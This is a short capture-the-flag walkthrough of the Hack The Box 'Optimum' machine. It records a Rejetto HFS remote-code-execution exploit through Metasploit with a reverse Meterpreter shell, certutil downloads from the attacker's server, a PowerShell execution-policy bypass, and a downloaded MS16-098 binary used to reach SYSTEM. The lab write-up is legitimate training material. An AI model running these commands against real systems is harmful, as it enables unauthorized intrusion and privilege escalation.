Optimum

HTB 7. Optimum

nmap -A -T4 -p- 10.10.10.8 reveals only port 80 running httpd 2.3
Going to 10.10.10.8 shows its a file server
Search for default credentials (httpd has no default credentials)
searchsploit rejetto (since rejetto is the vender of this file server)
Search google for rejetto hfs 2.3 exploit reveals metasploit remote code execution and many others
Nmap reveals probably an OS that the exploit works on
Metasploit use exploit/windows/http/rejetto_hfs_exec, set rhsots, and set payload to windows/x64/meterpreter/reverse_tcp
set lhost tun0 instead of typing in IP (because its faster)
sysinfo shows x64 on x64 and getid is kostas
Attempt priv esc: getsystem fails, background and use post/multi/recon/local_exploit_suggester (set session 1) and run reveals nothing
sherlock by rastamouse (or more up-to-date version Watson)
Search google for windows 2002 r2 (build 9600) privilege escalation reveals exploit-db exploit avaible that might possibly work
Search ms16-032 in metasploit shows there is a module for it. Lets use it. Set target to 1 which is x64. Set lhost tun0 and lport 443. Ran twice; didn't work.
Manual method: Download sherlock above as sher.ps1. Start http server with python and use cerutil (certutil -urlcache -f http://10.10.14.14/sher.ps1 sher.ps1) to download file. Run with powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}". Result: 3 Potential vulnerabilities
Clone AonCyberLabs/Windows-Exploit-Suggester, run python ./windows-exploit-suggester.py --update
Run systeminfo in shell on target and put in text file for windows-exploit-suggester.py.
Run python ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt which detects MS16-098 exploit; download exploit from exploit-db.
gcc 41020.c ex.exe fails so lets download the binary from the link provided on exploit-db.
Run python web server, download to target, and run with sh.exe.
whoami gives us nt authority\system

PreviousNibbles

Last updated 3 years ago

Was this helpful?